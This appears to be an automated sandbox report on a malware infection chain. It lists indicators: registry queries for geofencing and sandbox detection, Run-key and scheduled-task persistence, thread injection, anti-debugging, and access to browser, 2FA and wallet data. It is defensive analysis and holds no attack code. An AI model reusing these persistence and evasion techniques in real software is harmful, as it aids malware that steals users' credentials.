djvu | 1cb6869826cf5ea749658c7622c8b4ecbcbb5c5e167ebc6623a01a0e0483e0f7

System Information Discovery

Processes:

Install.exeWerFault.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 24 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

iyYRA2zjB7qX2F6ikmR6SV3S.exeInstall.exe4B3of8v9JlXMrHyDZ8ywGtP7.exeInstall.exewin.exewin.exeeMd30NO5w6CXpLgXXFSPbQav.exeOWJw6KtR2NwUoYenThY2ECt7.exeIYEx72bTlmcph7YqkziCwtDG.exesetup.tmpwin.exe4D92.exeLzmwAqmV.exeHiBTZE6Gv4KxjmirFmay03bJ.exe6AMZrD3zpEI3XVpw_LFdRZFT.exe6LMUTF51wzLnUCA_NSsUzVYC.exeanytime1.exesetup_x86_x64_install.exesetup_installer.exerundll32.exeanytime2.exeLzmwAqmV.exePhsHMlF6tpL4cItkeiIXvtL7.exezhangyan.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	iyYRA2zjB7qX2F6ikmR6SV3S.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	4B3of8v9JlXMrHyDZ8ywGtP7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	win.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	win.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	eMd30NO5w6CXpLgXXFSPbQav.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	OWJw6KtR2NwUoYenThY2ECt7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	IYEx72bTlmcph7YqkziCwtDG.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	setup.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	win.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	4D92.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	LzmwAqmV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	HiBTZE6Gv4KxjmirFmay03bJ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	6AMZrD3zpEI3XVpw_LFdRZFT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	6LMUTF51wzLnUCA_NSsUzVYC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	anytime1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	setup_x86_x64_install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	anytime2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	LzmwAqmV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	PhsHMlF6tpL4cItkeiIXvtL7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	zhangyan.exe

Loads dropped DLL 40 IoCs

Processes:

setup_install.exeTue02b2110095fe706.tmpOWJw6KtR2NwUoYenThY2ECt7.exetaskmgr.exerundll32.exeudontsay.exesetup.tmpRoutes Installation.exeXxxLGMW.exesetup.tmpWerFault.exerundll32.exerundll32.exerundll32.exewin.exerundll32.exeSoft706.exeIYEx72bTlmcph7YqkziCwtDG.exeRoutes.exe

pid	process
2088	setup_install.exe
2088	setup_install.exe
2088	setup_install.exe
2088	setup_install.exe
2088	setup_install.exe
2088	setup_install.exe
4284	Tue02b2110095fe706.tmp
1176	OWJw6KtR2NwUoYenThY2ECt7.exe
1332	taskmgr.exe
5156	rundll32.exe
5156	rundll32.exe
2188	udontsay.exe
2988	setup.tmp
1760	Routes Installation.exe
1760	Routes Installation.exe
1760	Routes Installation.exe
1760	Routes Installation.exe
1760	XxxLGMW.exe
5096	setup.tmp
1576	WerFault.exe
4456	rundll32.exe
4456	rundll32.exe
5388	rundll32.exe
5388	rundll32.exe
3696	rundll32.exe
3696	rundll32.exe
5564	win.exe
5564	win.exe
5304	rundll32.exe
5304	rundll32.exe
3880	Soft706.exe
3880	Soft706.exe
932	IYEx72bTlmcph7YqkziCwtDG.exe
932	IYEx72bTlmcph7YqkziCwtDG.exe
3880	Soft706.exe
3880	Soft706.exe
2548	Routes.exe
3880	Soft706.exe
2548	Routes.exe
2548	Routes.exe

Obfuscated with Agile.Net obfuscator 3 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\OWJw6KtR2NwUoYenThY2ECt7.exe	agile_net
C:\Users\Admin\Pictures\Adobe Films\OWJw6KtR2NwUoYenThY2ECt7.exe	agile_net
behavioral2/memory/1176-265-0x0000000000A30000-0x0000000000A58000-memory.dmp	agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

8860B.exeSoft706.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	8860B.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run	Soft706.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Routes = "C:\\Users\\Admin\\AppData\\Roaming\\Routes\\Routes.exe --B4lBeMRI"	Soft706.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

209 api.db-ip.com
238 api.db-ip.com
118 api.db-ip.com
119 api.db-ip.com
201 ipinfo.io
202 ipinfo.io
236 ipinfo.io
17 ip-api.com
114 ipinfo.io
115 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
209	api.db-ip.com
238	api.db-ip.com
118	api.db-ip.com
119	api.db-ip.com
201	ipinfo.io
202	ipinfo.io
236	ipinfo.io
17	ip-api.com
114	ipinfo.io
115	ipinfo.io

Drops file in System32 directory 7 IoCs

Processes:

powershell.exepowershell.exesOpKwDq.exeInstall.exeInstall.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	sOpKwDq.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	sOpKwDq.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

Processes:

6zYhJZFz7hGRxH5AOfPbfb1q.exeC3TEUj3w0my3sG6vseSS1ODk.execmd.exeWerFault.exeTrdngAnlzr1649.exe7929_1647444188_3653.exe82E1H.exeHLA0C.exeD0826.exe8860B.exeLzmwAqmV.exeLzmwAqmV.exe

pid	process
4216	6zYhJZFz7hGRxH5AOfPbfb1q.exe
5068	C3TEUj3w0my3sG6vseSS1ODk.exe
4992	cmd.exe
1708	WerFault.exe
1848	TrdngAnlzr1649.exe
1708	WerFault.exe
5488	7929_1647444188_3653.exe
5596	82E1H.exe
5892	HLA0C.exe
6060	D0826.exe
5252	8860B.exe
1692	LzmwAqmV.exe
5468	LzmwAqmV.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Tue026e94a5005f8.exeLzmwAqmV.exeOWJw6KtR2NwUoYenThY2ECt7.exe

description	pid	process	target process
PID 2188 set thread context of 4696	2188	Tue026e94a5005f8.exe	Tue026e94a5005f8.exe
PID 1692 set thread context of 4892	1692	LzmwAqmV.exe	f3t_lQbSoGh1nC6Koq2DOK1A.exe
PID 1176 set thread context of 6012	1176	OWJw6KtR2NwUoYenThY2ECt7.exe	MSBuild.exe

Drops file in Program Files directory 5 IoCs

Processes:

setup.tmpPhsHMlF6tpL4cItkeiIXvtL7.exe

description	ioc	process
File created	C:\Program Files (x86)\AtomTweaker\unins000.dat	setup.tmp
File created	C:\Program Files (x86)\AtomTweaker\is-9RPGD.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\AtomTweaker\unins000.dat	setup.tmp
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	PhsHMlF6tpL4cItkeiIXvtL7.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	PhsHMlF6tpL4cItkeiIXvtL7.exe

Drops file in Windows directory 2 IoCs

Processes:

schtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 50 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4384	2088	WerFault.exe	setup_install.exe
5020	3624	WerFault.exe	Tue026e182673.exe
1932	1828	WerFault.exe	Tue029560e6534e190c.exe
4468	3624	WerFault.exe	Tue026e182673.exe
4664	3624	WerFault.exe	Tue026e182673.exe
4300	3624	WerFault.exe	Tue026e182673.exe
3532	3624	WerFault.exe	Tue026e182673.exe
3404	3624	WerFault.exe	Tue026e182673.exe
3628	3624	WerFault.exe	Tue026e182673.exe
3004	3624	WerFault.exe	Tue026e182673.exe
2280	3624	WerFault.exe	Tue026e182673.exe
4140	4964	WerFault.exe	EeyZAYeCN3aiMcSvuVipi9sT.exe
1576	4880	WerFault.exe	X6dtQACQioqiebfEUtPmI4ox.exe
2512	4964	WerFault.exe	EeyZAYeCN3aiMcSvuVipi9sT.exe
1208	4880	WerFault.exe	X6dtQACQioqiebfEUtPmI4ox.exe
3236	4828	WerFault.exe	4B3of8v9JlXMrHyDZ8ywGtP7.exe
1704	4892	WerFault.exe	f3t_lQbSoGh1nC6Koq2DOK1A.exe
3868	4828	WerFault.exe	4B3of8v9JlXMrHyDZ8ywGtP7.exe
3328	4828	WerFault.exe	4B3of8v9JlXMrHyDZ8ywGtP7.exe
1784	4828	WerFault.exe	4B3of8v9JlXMrHyDZ8ywGtP7.exe
1848	1816	WerFault.exe	5DEw0GYq8p1VZbbph7v4UOlH.exe
3420	4828	WerFault.exe	4B3of8v9JlXMrHyDZ8ywGtP7.exe
4088	4296	WerFault.exe	gsqNVzo3JRFSA0n3M3dgMnUr.exe
972	3124	WerFault.exe	FmzEkQeE092RvzJXs6o8zx5r.exe
2984	4828	WerFault.exe	4B3of8v9JlXMrHyDZ8ywGtP7.exe
4976	4296	WerFault.exe	gsqNVzo3JRFSA0n3M3dgMnUr.exe
4392	4828	WerFault.exe	4B3of8v9JlXMrHyDZ8ywGtP7.exe
632	3124	WerFault.exe	FmzEkQeE092RvzJXs6o8zx5r.exe
5588	4296	WerFault.exe	gsqNVzo3JRFSA0n3M3dgMnUr.exe
5956	5740	WerFault.exe	siww1049.exe
5040	3124	WerFault.exe	FmzEkQeE092RvzJXs6o8zx5r.exe
5468	4296	WerFault.exe	gsqNVzo3JRFSA0n3M3dgMnUr.exe
5816	4828	WerFault.exe	4B3of8v9JlXMrHyDZ8ywGtP7.exe
5724	3624	WerFault.exe	Tue026e182673.exe
1708	4296	WerFault.exe	gsqNVzo3JRFSA0n3M3dgMnUr.exe
5516	3124	WerFault.exe	FmzEkQeE092RvzJXs6o8zx5r.exe
1544	3624	WerFault.exe	Tue026e182673.exe
2720	1388	WerFault.exe	bearvpn3.exe
5656	4296	WerFault.exe	gsqNVzo3JRFSA0n3M3dgMnUr.exe
3588	3124	WerFault.exe	FmzEkQeE092RvzJXs6o8zx5r.exe
5040	3624	WerFault.exe	Tue026e182673.exe
5132	3416	WerFault.exe	5DDF.exe
6088	3416	WerFault.exe	5DDF.exe
5776	3124	WerFault.exe	FmzEkQeE092RvzJXs6o8zx5r.exe
2020	3624	WerFault.exe	Tue026e182673.exe
688	3124	WerFault.exe	FmzEkQeE092RvzJXs6o8zx5r.exe
4440	5404	WerFault.exe	win.exe
2676	5544	WerFault.exe	win.exe
456	4232	WerFault.exe	Avvelenate.exe.pif
5484	4232	WerFault.exe	Avvelenate.exe.pif

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

Tue02522f9ea0b1.exetaskmgr.exeQ9_E6thG7mij2_I43zmvk8Rh.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue02522f9ea0b1.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Q9_E6thG7mij2_I43zmvk8Rh.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Q9_E6thG7mij2_I43zmvk8Rh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	WerFault.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	WerFault.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue02522f9ea0b1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue02522f9ea0b1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Q9_E6thG7mij2_I43zmvk8Rh.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	WerFault.exe

Checks processor information in registry 2 TTPs 30 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

FmzEkQeE092RvzJXs6o8zx5r.exea1758ed0-2ffb-4d6c-b693-e91a0ab69bdf7906170.exetaskmgr.exeIYEx72bTlmcph7YqkziCwtDG.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	FmzEkQeE092RvzJXs6o8zx5r.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	FmzEkQeE092RvzJXs6o8zx5r.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	a1758ed0-2ffb-4d6c-b693-e91a0ab69bdf7906170.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	FmzEkQeE092RvzJXs6o8zx5r.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	FmzEkQeE092RvzJXs6o8zx5r.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	IYEx72bTlmcph7YqkziCwtDG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	IYEx72bTlmcph7YqkziCwtDG.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	FmzEkQeE092RvzJXs6o8zx5r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	a1758ed0-2ffb-4d6c-b693-e91a0ab69bdf7906170.exe

Creates scheduled task(s) 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
5096	schtasks.exe
4488	schtasks.exe
5396	schtasks.exe
2540	schtasks.exe
2716	schtasks.exe
2812	schtasks.exe
5400	schtasks.exe
6068	schtasks.exe
5300	schtasks.exe
3484	schtasks.exe
5596	schtasks.exe
5016	schtasks.exe
4044	schtasks.exe
4008	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3236 timeout.exe
1816 timeout.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

620 tasklist.exe
4796 tasklist.exe
3228 tasklist.exe
6064 tasklist.exe

pid	process
3236	timeout.exe
1816	timeout.exe

pid	process
620	tasklist.exe
4796	tasklist.exe
3228	tasklist.exe
6064	tasklist.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

Install.exeInstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2844 taskkill.exe
5404 taskkill.exe
4792 taskkill.exe
4116 taskkill.exe

pid	process
2844	taskkill.exe
5404	taskkill.exe
4792	taskkill.exe
4116	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

Processes:

LI3FA3IG15M57IM.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	LI3FA3IG15M57IM.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	LI3FA3IG15M57IM.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync	LI3FA3IG15M57IM.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	LI3FA3IG15M57IM.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
